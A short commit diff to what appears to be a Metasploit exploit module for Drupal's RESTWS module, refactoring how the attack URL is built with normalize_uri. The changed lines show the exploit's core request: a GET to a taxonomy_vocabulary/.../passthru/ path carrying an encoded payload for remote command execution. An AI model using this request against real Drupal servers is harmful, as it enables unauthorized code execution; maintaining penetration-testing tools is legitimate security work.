Use normalize_uri params instead of string concatenation

mdisec · mdisec · commit 650034b60082 · 2016-07-19T01:01:05.000+03:00
diff --git a/modules/exploits/unix/webapp/drupal_restws_exec.rb b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -71,7 +71,7 @@ def check
 
   def exploit
     r = rand_text_alpha(4 + rand(4))
-    url = normalize_uri(target_uri.path, "taxonomy_vocabulary/" + r + "/passthru/" + Rex::Text.uri_encode(payload.encoded))
+    url = normalize_uri(target_uri.path, "taxonomy_vocabulary/", r ,"/passthru/", Rex::Text.uri_encode(payload.encoded))
     send_request_cgi(
       'method' => 'GET',
       'uri' => url
